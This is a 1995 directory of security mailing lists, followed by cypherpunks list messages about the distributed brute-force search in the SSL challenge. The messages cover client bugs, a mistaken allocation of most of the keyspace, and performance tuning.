academic environment. It is complementary to the Firewalls list maintained by
Brent Chapman (send subscription requests to Majordomo@GreatCircle.COM) which
deals primarily with firewall issues in a commercial environment. Academic
environments have different political structures, ethical issues, expectations
of privacy and expectations of access.

Many documented incidents of cracker intrusions have either originated at or
passed through academic institutions. The security at most universities is
notoriously lax or even in some cases completely absent. Most institutions
don't use firewalls because they either don't care about their institution's
security, they feel firewalls are not appropriate or practical, or they don't
know the extent to which they are under attack from the Internet.

At Texas A&M University we have been using a combination of a flexible packet
filter, intrusion detection tools, and Unix security audit utilities for almost
two years. We have found that simple firewalls combined with other tools are
feasible in an academic environment. Hopefully the discussion on this list will
begin to raise the awareness of other institutions also.

-------------------------------------------------------------------------------

Best of Security

To join, send e-mail to best-of-security-request@suburbia.net with the
following in the body of the message:

     subscribe best-of-security

REASONS FOR INCEPTION

In order to compile the average security administrator it was found that the
compiler had to parse a foreboding number of exceptionally noisy and
semantically-content-free data sets. This led to exceptionally high load
averages and a dramatic increase in core entropy.

Further, the number, names and locations of this data appears to change on an
almost daily basis; requiring tedious version control on the part of the mental
maintainer. Best-of-Security is at present an un-moderated list. That may sound
strange given our stated purpose of massive entropy reduction; but because best
often equates with "vital" and the moderator doesn't have an MDA habit it is
important that material sent to this list be delivered to its subscribers' in
as minimal period of time as is (in)humanly possible.

If you find *any* information from *any* source (including other mailinglists,
newsgroups, conference notes, papers, etc) that fits into one of the acceptable
categories described at the end of this document then you should *immediately*
send it to "best-of-security@suburbia.net". Do not try and predict whether or
not someone else will send the item in question to the list in the immediate
future. Unless your on a time-delayed mail vector such as polled uucp or the
item has already appeared on best-of-security, mail the info to the list! Even
if it is a widely deployed peice of information such as a CERT advisory the
proceeding argument still applies. If the information hasn't appeared on this
list yet, then SEND IT. It is far better to run the risk of minor duplication
in exchange for having the information out where it is needed than act
conservatively about occasional doubling up on content.

-------------------------------------------------------------------------------

Bugtraq

To join, send e-mail to LISTSERV@NETSPACE.ORG and, in the text of your message
(not the subject line), write:

     SUBSCRIBE BUGTRAQ

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vunerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

   *  Information on Unix related security holes/backdoors (past and present)
   *  Exploit programs, scripts or detailed processes about the above
   *  Patches, workarounds, fixes
   *  Announcements, advisories or warnings
   *  Ideas, future plans or current works dealing with Unix security
   *  Information material regarding vendor contacts and procedures
   *  Individual experiences in dealing with above vendors or security
     organizations
   *  Incident advisories or informational reporting

-------------------------------------------------------------------------------

Computer Privacy Digest

To join, send e-mail to comp-privacy-request@uwm.edu and, in the text of your
message (not the subject line), write:

     subscribe cpd

The Computer PRIVACY Digest (CPD) (formerly the Telecom Privacy digest) is run
by Leonard P. Levine. It is gatewayed to the USENET newsgroup
comp.society.privacy. It is a relatively open (i.e., less tightly moderated)
forum, and was established to provide a forum for discussion on the effect of
technology on privacy. All too often technology is way ahead of the law and
society as it presents us with new devices and applications. Technology can
enhance and detract from privacy.

-------------------------------------------------------------------------------

Computer Underground Digest

To join, send e-mail to LISTSERV@VMD.CSO.UIUC.EDU and, in the text of your
message (not the subject line), write:

     SUB CUDIGEST

CuD is available as a Usenet newsgroup: comp.society.cu-digest

Covers many issues of the computer underground.

-------------------------------------------------------------------------------

Cypherpunks

To join, send e-mail to majordomo@toad.com and, in the text of your message
(not the subject line), write:

     SUBSCRIBE cypherpunks

The cypherpunks list is a forum for discussing personal defenses for privacy in
the digital domain. It is a high volume mailing list.

-------------------------------------------------------------------------------

Cypherpunks Announce

To join, send e-mail to majordomo@toad.com and, in the text of your message
(not the subject line), write:

     SUBSCRIBE cypherpunks-announce

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and important
developments will be posted there.

-------------------------------------------------------------------------------

Firewalls

To join, send e-mail to majordomo@greatcircle.com and, in the text of your
message (not the subject line), write:

     SUBSCRIBE firewalls

Useful information regarding firewalls and how to implement them for security.

This list is for discussions of Internet "firewall" security systems and
related issues. It is an outgrowth of the Firewalls BOF session at the Third
UNIX Security Symposium in Baltimore on September 15, 1992.

-------------------------------------------------------------------------------

Intrusion Detection Systems

To join, send e-mail to majordomo@uow.edu.au with the following in the body of
the message:

     subscribe ids

The list is a forum for discussions on topics related to development of
intrusion detection systems.

Possible topics include:

   *  techniques used to detect intruders in computer systems and computer
     networks
   *  audit collection/filtering
   *  subject profiling
   *  knowledge based expert systems
   *  fuzzy logic systems
   *  neural networks
   *  methods used by intruders (known intrusion scenarios)
   *  cert advisories
   *  scripts and tools used by hackers
   *  computer system policies
   *  universal intrusion detection system

-------------------------------------------------------------------------------

Phrack

To join, send e-mail to phrack@well.com and, in the text of your message (not
the subject line), write:

     SUBSCRIBE Phrack

Phrack is a Hacker Magazine which deals with phreaking and hacking.

-------------------------------------------------------------------------------

PRIVACY Forum

To join, send e-mail to privacy-request@vortex.com and, in the text of your
message (not the subject line), write:

     information privacy

The PRIVACY Forum is run by Lauren Weinstein. He manages it as a rather
selectively moderated digest, somewhat akin to RISKS; it spans the full range
of both technological and non-technological privacy-related issues (with an
emphasis on the former).

-------------------------------------------------------------------------------

Risks

To join, send e-mail to risks-request@csl.sri.com and, in the text of your
message (not the subject line), write:

     SUBSCRIBE

Risks is a digest that describes many of the technological risks that happen in
today's environment.

-------------------------------------------------------------------------------

Sneakers

To join, send e-mail to majordomo@CS.YALE.EDU and, in the text of your message
(not the subject line), write:

     SUBSCRIBE Sneakers

The Sneakers mailing list is for discussion of LEGAL evaluations and
experiments in testing various Internet "firewalls" and other TCP/IP network
security products.

   *  Vendors are welcome to post challenges to the Internet network security
     community
   *  Internet users are welcome to post anecdotal experiences regarding
     (legally) testing the defenses of firewall and security products.
   *  "Above board" organized and/or loosely organized wide area tiger teams
     (WATTs) can share information, report on their progress or eventual
     success here.

There is a WWW page with instructions on un/subscribing as well as posting, and
where notices and pointers to resources (especially if I set up an archive of
this list) may be put up from time to time:

http://www.cs.yale.edu/HTML/YALE/CS/HyPlans/long-morrow/sneakers.html

-------------------------------------------------------------------------------

Virus

To join, send e-mail to LISTSERV@lehigh.edu and, in the text of your message
(not the subject line), write:

     SUBSCRIBE virus-l your-name

It is an electronic mail discussion forum for sharing information and ideas
about computer viruses, which is also distributed via the Usenet Netnews as
comp.virus. Discussions should include (but not necessarily be limited to):
current events (virus sightings), virus prevention (practical and theoretical),
and virus related questions/answers. The list is moderated and digested. That
means that any message coming in gets sent to me, the editor. I read through
the messages and make sure that they adhere to the guidelines of the list (see
below) and add them to the next digest. Weekly logs of digests are kept by the
LISTSERV (see below for details on how to get them). For those interested in
statistics, VIRUS-L is now up to about 2400 direct subscribers. Of those,
approximately 10% are local redistribution accounts with an unknown number of
readers. In addition, approximately 30,000-40,000 readers read comp.virus on
the USENET.

-------------------------------------------------------------------------------

Virus Alert

To join, send e-mail to LISTSERV@lehigh.edu and, in the text of your message
(not the subject line), write:

     SUBSCRIBE valert-l your-name

What is VALERT-L?

It is an electronic mail discussion forum for sharing urgent virus warnings
among other computer users. Postings to VALERT-L are strictly limited to
warnings about viruses (e.g., "We here at University/Company X just got hit by
virus Y - what should we do?"). Followups to messages on VALERT-L should be
done either by private e-mail or to VIRUS-L, a moderated, digested, virus
discussion forum also available on this LISTSERV, LISTSERV@LEHIGH.EDU. Note
that any message sent to VALERT-L will be cross-posted in the next VIRUS-L
digest. To preserve the timely nature of such warnings and announcements, the
list is moderated on demand (see posting instructions below for more
information).

What VALERT-L is *not*?

A place to to anything other than announce virus infections or warn people
about particular computer viruses (symptoms, type of machine which is
vulnerable, etc.).

-------------------------------------------------------------------------------

Security Products

-------------------------------------------------------------------------------

Tiger

To join, send e-mail to majordomo@net.tamu.edu and, in the text of your message
(not the subject line), write:

     SUBSCRIBE tiger

Discussion list for the UNIX security audit tool TIGER

This is the TIGER users mailling list. It is for:

  1.  Update announcements
  2.  Reporting bugs in TIGER.
  3.  Discussing new features for TIGER.
  4.  Discussing use of TIGER.
  5.  Discussing anything else about TIGER.

What is TIGER?

TIGER is a set of shell scripts, C code and configuration files which are used
to perform a security audit on UNIX systems. The goals for TIGER are to make it
very robust and easy to use. TIGER was originally developed for checking hosts
at Texas A&M University following a break in in the Fall of 1992.

The latest version of TIGER is always available from the directory
net.tamu.edu:/pub/security/TAMU. In addition, updated digital signature files
for new platforms and new security patches will be maintained in the directory:

net.tamu.edu:/pub/security/TAMU/tiger-sigs.

-------------------------------------------------------------------------------

TIS Firewall Toolkit

To join, send e-mail to fwall-users-request@tis.com and, in the text of your
message (not the subject line), write:

     SUBSCRIBE

Discussion list for the TIS firewall toolkit

-------------------------------------------------------------------------------

Vendors and Organizations

-------------------------------------------------------------------------------

CERT (Computer Emergency Response Team) Advisory mailing list.

To join, send e-mail to cert@cert.org and, in the text of your message (not the
subject line), write:

     I want to be on your mailing list.

Past advisories and other information related to computer security are
available for anonymous FTP from cert.org (192.88.209.5).

-------------------------------------------------------------------------------

The CIAC (Computer Incident Advisory Capability) of DoE

CIAC has several self-subscribing mailing lists for electronic publications:

  1.  CIAC-BULLETIN for Advisories, highest priority - time critical
     information and Bulletins, important computer security information;
  2.  CIAC-NOTES for Notes, a collection of computer security articles;
  3.  SPI-ANNOUNCE for official news about Security Profile Inspector (SPI)
     software updates, new features, distribution and availability;
  4.  SPI-NOTES, for discussion of problems and solutions regarding the use of
     SPI products.

To join, send e-mail to ciac-listproc@llnl.gov and, in the text of your message
(not the subject line), write any of the following examples:

     subscribe ciac-bulletin LastName, FirstName PhoneNumber
     subscribe ciac-notes LastName, FirstName PhoneNumber
     subscribe spi-announce LastName, FirstName PhoneNumber
     subscribe spi-notes LastName, FirstName PhoneNumber
     e.g., subscribe ciac-notes O'Hara, Scarlett 404-555-1212

You will receive an acknowledgment containing address, initial PIN, and
information on how to change either of them, cancel your subscription, or get
help.

-------------------------------------------------------------------------------

HP, Hewlett Packard

To join, send e-mail to support@support.mayfield.hp.com and, in the text of
your message (not the subject line), write:

     subscribe security_info

The latest digest of new HP Security Bulletins will be distributed directly to
your mailbox on a routine basis.
-------------------------------------------------------------------------------

Sun Security Alert

To join, send e-mail to security-alert@sun.com and, in the subject of your
message write:

     SUBSCRIBE CWS your-email-addr

The message body should contain affiliation and contact information.

-------------------------------------------------------------------------------

Copyright

This paper is Copyright (c) 1995
   by Christopher Klaus of Internet Security Systems, Inc.

Permission is hereby granted to give away free copies electronically. You may
distribute, transfer, or spread this paper electronically. You may not pretend
that you wrote it. This copyright notice must be maintained in any copy made.
If you wish to reprint the whole or any part of this paper in any other medium
excluding electronic medium, please ask the author for permission.

Disclaimer

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no event shall the author be
liable for any damages whatsoever arising out of or in connection with the use
or spread of this information. Any use of this information is at the user's own
risk.

Address of Author

Please send suggestions, updates, and comments to:
Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
<iss@iss.net>

Internet Security Systems, Inc.

Internet Security Systems, Inc, located in Atlanta, Ga., specializes in the
developement of security scanning software tools. Its flagship product,
Internet Scanner, is software that learns an organization's network and probes
every device on that network for security holes. It is the most comprehensive
"attack simulator" available, checking for over 100 security vulnerabilities.
-- 
Christopher William Klaus	     Voice: (770)441-2531. Fax: (770)441-2431
Internet Security Systems, Inc.            "Internet Scanner lets you find
2000 Miller Court West, Norcross, GA 30071   your network security holes 
Web: http://iss.net/  Email: cklaus@iss.net   before the hackers do."



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 16:08:05 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: server congestion?
In-Reply-To: <"swan.cl.cam.:271770:950824230145"@cl.cam.ac.uk>
Message-ID: <199508242307.QAA26628@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| The design of the prtotocol assumes a hierarchy -- maybe in the next attempt.

Ok, neat. I was merely thinking of a simple static partitioning of it
right now.

| but there are problems with acking to the right server, deciding which to
| contact, etc.

I was rather thinking of a simplistic solution right now, looking in
the log of active calculators, roughly dividing them up into two
similarly sized groups etc. But I guess this isn't as easy as I
thought it would be.

| > Another thing that might decrease the load on the server
| > is if we start allocating more blocks at a time, lets
| > say 2-4 blocks each time. Wouldn't that help?
| 
| I think most of the load is "HELO COMM QUIT" clients.
| Yes -- we had thought of upping the allocation ....

Ok.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Thu, 24 Aug 95 14:23:24 PDT
To: cypherpunks@toad.com
Subject: SSL CHALLENGE
In-Reply-To: <9508242051.AA13777@toad.com>
Message-ID: <Pine.BSD.3.91.950824162000.5485B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain



I have a small linux box doing 1000 keys per second.  I had to 
re-download the brloop and brclient, cuse when I viewed them on the WWW 
page and attempted ot save them I forgo that Lynx will truncate soem 
lines, leaving me with some errors.  I got complete correct versions an 
the box is chugging away.

Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting   It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jered@MIT.EDU
Date: Thu, 24 Aug 95 13:32:08 PDT
To: cypherpunks@toad.com
Subject: BruteSSL: WTF? 0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>
Message-ID: <199508242031.QAA04083@narn.atype.com>
MIME-Version: 1.0
Content-Type: text/plain



It appears that Joe Thomas <jthomas@ogi.com> has more or less locked
(until things start getting reassigned) most of the keyspace.  Even if
he had a MasPar, it would still take him more than 2 days to check this
space.  Does anyone know what the deal with this is?  A simple error?
A malicious attack? (I think that the SKSP is far to insecure to be
effective....I could falsely ACK parts of the keyspace if I wanted to be
mean.) An NSA agent who will check that keyspace and return the results
in the next hour?

--Jered
jered@mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Thu, 24 Aug 95 15:53:31 PDT
To: cypherpunks@toad.com
Subject: Re: server congestion
Message-ID: <199508242251.QAA23003@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Christian Wettergren:
>is if we start allocating more blocks at a time, lets
>say 2-4 blocks each time. Wouldn't that help?
 
Heh heh heh
 
Somebody should tell that to the guy who's pulling them down 500 at a time.
I have to settle for 32 x 7 at a time, in order to manage runtime at 9 hours.
And the clever thing is, I have to stay connected to all 7 machines in order
to keep running.
 
Good thing there's an incremental notice, so I can restart if I lose carrier.
 
You know, this is really fun. Too bad the prize isn't something really cool,
like a free wastebasket in case Windoze 95 comes my way...
 
 
Sorry, just felt like it was my turn to babble...
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 24 Aug 95 13:51:45 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
Message-ID: <9508242051.AA13777@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been looking at the allocated list of keys, and I notice a possible 
problem:  One user has allocated 50,000 segements:

0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>

Now, it's possible this fellow has some vast farm of high-speed 
workstations, but I doubt it.  Finger suggests that this is a linux
box.  My suspicion - and let me apologize in advance if I'm wrong - is
that Mr. Thomas thinks he's allocated himself
50,000 keys, whereas he's actually got  838,860,800,000.

Mr Thomas, if you're listening, PLEASE tell us what's going on.
You've reserved 3/4 of the keyspace, and you're going to screw up the 
search unless you have an NSA-sized data center.

I suggest we assume this is an error, and remove the block from the
reserved list so that it can be re-allocated.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 08:56:32 PDT
To: frissell@com.panix
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
In-Reply-To: <199508241543.LAA07735@panix.com>
Message-ID: <11763.9508241555@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell <frissell@panix.com> writes on cpunks:
> Is that really 1800 GMT or 1800 BST?  1400 or 1300 hrs EDT?

Yep really 18:00 GMT, ie slightly over 2 hours from now approx.

> I'm ready to hurl my 7800 keys/sec 486/66 into the fray.  I should be able
> to do about 24 segments over 12 hours tonight using brutessl.exe 1.02 for
> DOS.  Maybe I should have been in line at Midnight to get WIN/95 so I could
> run it automatically.
>
> The 32-bit Windows version does *not* work with my old Windows 3.11 even
> with the latest Microsoft 32-bit add in.

Yep, getting a decent 32 bit app for windows / DOS seems to be a
problem alright.  Pity as the 32 bit app runs appreciably faster.

I made a plea for a DJGCC (DOS port of GNU cc) compiled binary, that
would run under bog standard DOS, and with full 32 bit, if we can find
anyone with the software to do it.  Any takers?

The prize fund has grown to c$ 372.30.

Ready, steady, go!

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 14:11:45 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL CHALLENGE: 0.11 borken?
In-Reply-To: <"swan.cl.cam.:219400:950824204042"@cl.cam.ac.uk>
Message-ID: <Pine.SUN.3.91.950824170950.22646B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Just downloaded the newest stuff and got:

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

Server not responding: Timed out

What do you make of that? (I'm running Linux)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jthomas@ogi.com (Joe Thomas)
Date: Thu, 24 Aug 95 14:09:31 PDT
To: rkw@dataplex.net (Richard Wackerbarth)
Subject: Re: Keys for ssl search
Message-ID: <m0sljjU-0007W0C@ogi>
MIME-Version: 1.0
Content-Type: text/plain


>0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>
>
>You have allocated over 3/4 of the total search space.
>I think that you accidently "bit off more than you can chew"
>The count is 2^24 keys per keyspace.
>
>Please return the extra keys and select a reasonable number (like 1 or 2)
>unless you have a superfast cluster of Crays.

(Noted by several others, too)

Sorry about this!  The Windows NT client asked "how many keys" I wanted to
check, not how many key segments.  50,000 sounded like a few seconds' work
on my P120.  I've attempted to return the keys using the "reject" button
(again on the Win32 client), but I don't think it took.  If anyone can tell
me what the quickest way to return these keys is, I'd really appreciate it.

Sorry, all,
Joe Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 14:25:06 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: brloop not working
In-Reply-To: <"swan.cl.cam.:150900:950824172806"@cl.cam.ac.uk>
Message-ID: <Pine.SUN.3.91.950824172125.22646D-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Ah, found the problem.  where is that "-" coming from??? [Linux]

++ nice -20 brutessl - 2977 d42f 1
usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

I've stopped it until I can get that fixed.  brclient is way huge now...I 
can't see how to get rid of the "-".

 -Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 17:24:13 PDT
To: ghio@cmu.edu (Matthew Ghio)
Subject: Re: Linux brutessl client
In-Reply-To: <m0slm0V-000wQYC@myriad>
Message-ID: <199508250023.RAA28560@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| I get 11100 keys/sec with Linux/gcc 2.5.8 on a 486/66, optimized with
| -O2 and -fomit-frame-pointer.
| 
| -fforce-mem and -funroll-loops made the program run more slowly.
| 
| I also tried -ffast-math -finline-functions -fforce-addr -fcaller-saves
| which seemed to make no difference.

I've tried to optimize the SunOS binary, but it seems as if 16400
keys/s is the maximum I can get on a SS10. No changes in optimization
flags has helped so far.

Has anyone got a better speed than this on a ordinary ss10, with SunOS
414?

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jthomas@ogi.com (Joe Thomas)
Date: Thu, 24 Aug 95 14:15:11 PDT
To: trei@process.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
Message-ID: <m0sljpH-0007W0C@ogi>
MIME-Version: 1.0
Content-Type: text/plain


You're right, I asked (I thought) for 50,000 keys -- a couple seconds' work
on my machine -- and got back 50,000 segments.  The WinNT client thinks it's
sent them back, but the web page still lists them as mine.  I can't find a
form on Adam's web site for sending back keys, either.

>I suggest we assume this is an error, and remove the block from the
>reserved list so that it can be re-allocated.

Please do, if you can!

Thanks,
Joe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 14:35:56 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: brloop not working
In-Reply-To: <"swan.cl.cam.:150900:950824172806"@cl.cam.ac.uk>
Message-ID: <Pine.SUN.3.91.950824172624.22646F-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Piete Brooks wrote:

> The first arg of brutessl is the file from which to read the config info.
> "-" is a unix convention for the file "stdin".

OK - I dig this, but brutessl on my Linux box is still complaining about 
usage...(sorry about the bandwidth but I assume other people are probably 
having similar problems)

+ eval brclient -dklLtssl|(read a;nice -20 brutessl - $a)|(read a;echo  
$a 1>&2;
 echo $a) |brclient -AlLtssl
++ brclient -dklLtssl
++ brclient -AlLtssl
++ read a
++ read a
++ nice -20 brutessl -
usage: brutessl [-q] <filename> <checksum> <start segment> <no of 
segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 17:42:30 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz meeting/party
Message-ID: <199508250042.RAA28903@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

Anyone in the Palo Alto area going to Tim's who would like
to give me a ride there? If so, drop me a line.

And Tim, take that as indication that I'm interested in
participating in the meeting. :-)

/Christian Wettergren
 Nordic Viking
 Sweden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Gillman <syshtg@gsusgi2.Gsu.EDU>
Date: Thu, 24 Aug 95 14:46:28 PDT
To: tedwards@src.umd.edu (Thomas Grant Edwards)
Subject: Re: brloop not working
In-Reply-To: <Pine.SUN.3.91.950824172624.22646F-100000@thrash.src.umd.edu>
Message-ID: <199508242146.RAA21529@gsusgi2.Gsu.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > The first arg of brutessl is the file from which to read the config info.
> > "-" is a unix convention for the file "stdin".
> 
> OK - I dig this, but brutessl on my Linux box is still complaining about 
> usage...(sorry about the bandwidth but I assume other people are probably 
> having similar problems)
> 
> ++ nice -20 brutessl -
> usage: brutessl [-q] <filename> <checksum> <start segment> <no of 
> segments>
>        brutessl [-q] -r <filename> [<no of segments>]
>        brutessl [-q] -t [<hours>[:<minutes>]]
>

Use 'nice -20 brutessl -- -' instead. The '--' tells getopts() not to parse
anything else as arguments, then the next '-' will be interpreted correctly.

Tom

-- 
 Tom Gillman, Unix/AIX Systems Weenie  |"For a privacy advocate to determine
 Wells Computer Center-Ga. State Univ. |the best way to do key escrow is like
 (404) 651-4503 syshtg@gsusgi2.gsu.edu |a death penalty opponent choosing
 I'm not allowed to have an opinion.   |between gas or electricity"-D.Banisar
                                    
  key to UNIX: echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq'|dc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 24 Aug 95 08:52:11 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
Message-ID: <9508241550.AA01200@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



There are also some links on 

  http://iaks-www.ira.uka.de/subjects/crypto.html

to ftp-servers with cryptographic stuff outside USA/Canada.


The page contains several crypto-related links and is
written in german language, but the ftp links at the end
of the page are language-independent.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Thu, 24 Aug 95 15:12:55 PDT
To: cypherpunks@toad.com
Subject: Re: Matt Blaze's paper on Clipper...
In-Reply-To: <199508241933.MAA21565@Csli.Stanford.EDU>
Message-ID: <m0slkIr-000wQYC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Christian Wettergren asked:
>I don't seem to be able to locate it, but I had it earlier on.
>Do anyone know where it is?
>
>I'm talking to a reporter about the EPIC alert, and wants to show
>him Matt's attack.

ftp.research.att.com /dist/mab/essproto.ps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 24 Aug 95 17:59:45 PDT
To: cypherpunks@toad.com
Subject: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <9508250015.AA22053@toad.com>
Message-ID: <199508250059.RAA02668@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Peter Trei" <trei@process.com> writes:
> I can't contact the server to request keyspace anymore - I get a...
> It looks like 12 hours on a P5/90 are going to waste (could have done...

Live and/or learn -- looks like the performance is a little better now
that they're handing out bigger chunks.  The important thing is to learn
something new each time so the next one goes more smoothly.  Should be
nicer with hierarchical servers and so on for the next challenge... DES
or lobotomized DES or whatever.

Re: the title above.  Remember in "Princess Bride" where Prince Humperdinck
tells an underling to go search the forest and rout out the troublemakers?
When he complained of the difficulty, he was told to form a "brute squad".

	Jim Gillogly
	Sterday, 3 Halimath S.R. 1995, 00:59




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 15:24:31 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: brloop not working
In-Reply-To: <"swan.cl.cam.:242090:950824214413"@cl.cam.ac.uk>
Message-ID: <Pine.SUN.3.91.950824181938.22646H-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Piete Brooks wrote:

> That's the problem -- "brclient -dklLtssl" failed to return any keys,
> [ congestion of the server :-((( ]
> so brutessl was called with just the "-" which brloop put there.

I see that can happen, but there is also:

++ brclient -dklLtssl
++ brclient -AlLtssl
++ read a
++ read a
++ nice -20 brutessl - 2977 d42f 1
usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]
++ echo

Where apparently I did get d42f, but brutessl 1.02 choked - I am going to 
take the advic of the other poster and add the "--" to the command.
Again this is on a Linux box.  I suggest that other Linuxers check their 
logfile for this behaviour.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 24 Aug 95 15:21:49 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge: some thoughts on the process.
Message-ID: <9508242221.AA18067@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, the game's afoot, and I have a few preliminary thoughts on the 
process.

1. We need some protection against massive allocation of keys - perhaps an 
upper limit of a few hundred segments. 

Piete had better be ready to loop the server - at this rate FFFF will be 
allocated sometime tommorrow.

2. It'd be nice if the NT Winsock client could loop, reporting results and 
getting new keys automatically each 
time it finished a block. As it is, it's not worth my running it overnight. 
For each of the P5/90 NT machines I'm using, I'm manually running brutessl 
with enough key to keep them busy till morning. I'd rather have something that 
reported results to the server as it went along.

This is part of a more general problem. A lot of people are doing this on 
standalone machines at work, and have no way of checking them during the
night. This is doubly true for weekends - theretically if someone hits 
jackpot at 6pm on Friday, we might not find out till 9am Monday. I will 
not be running on any work machines over the weekend.

3. Start time was a little ragged - 1800 GMT was named, but the server 
seemed to come up at 2PM east coast time, which is (I think) 1900 GMT. I 
